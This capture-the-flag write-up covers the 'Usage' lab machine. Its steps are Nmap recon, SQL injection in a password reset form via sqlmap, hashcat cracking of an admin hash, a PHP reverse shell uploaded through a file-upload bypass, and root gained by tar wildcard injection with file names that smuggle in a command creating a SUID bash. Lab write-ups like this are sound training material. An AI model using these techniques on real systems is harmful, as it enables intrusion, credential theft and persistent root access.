Usage
Reconnaissance
Starting with our initial Nmap scan:
nmap -sC -sV -oN nmap/initial 10.10.11.18
The scan reveals two open ports:
- Port 22 — SSH
- Port 80 — HTTP
Enumeration
We add usage.htb to our /etc/hosts file and browse to port 80, where we find a blog website with user registration and login functionality.
Trying basic SQL injection payloads on the login page bypasses the authentication or results in an error. We realize the password reset function is vulnerable to SQL injection.
Foothold
Using sqlmap on the password reset endpoint, we map out the database:
sqlmap -r request.txt --batch --dbs
The database contains user credentials, including an administrator hash. We crack the hash using hashcat:
hashcat -m 3200 hash.txt rockyou.txt
Logging in as the admin, we find an option to upload an avatar. The file upload functionality has a bypass that permits uploading PHP files disguised as images (e.g., using a .php.jpg extension and modifying the magic bytes).
We upload a standard PHP reverse shell and trigger it by navigating to /uploads/profile.php.
nc -lvnp 4444
We receive a shell as the user dash.
cat /home/dash/user.txt
Privilege Escalation
Enumerating the system, we check processes and cron jobs. We find an interesting backup script running periodically as root. The script uses the wildcard * to compress files in a directory using tar.
cat /usr/local/bin/backup.sh
# tar -czf /var/backups/backup.tar.gz *
This is vulnerable to a classic wildcard injection. We create two files named --checkpoint=1 and --checkpoint-action=exec=sh exploit.sh in the directory being backed up.
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > exploit.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh exploit.sh"
Once the cron job executes, it runs our exploit.sh script with root privileges, giving SUID permissions to our copy of bash.
/tmp/bash -p
whoami
# root
Root flag captured! 🏴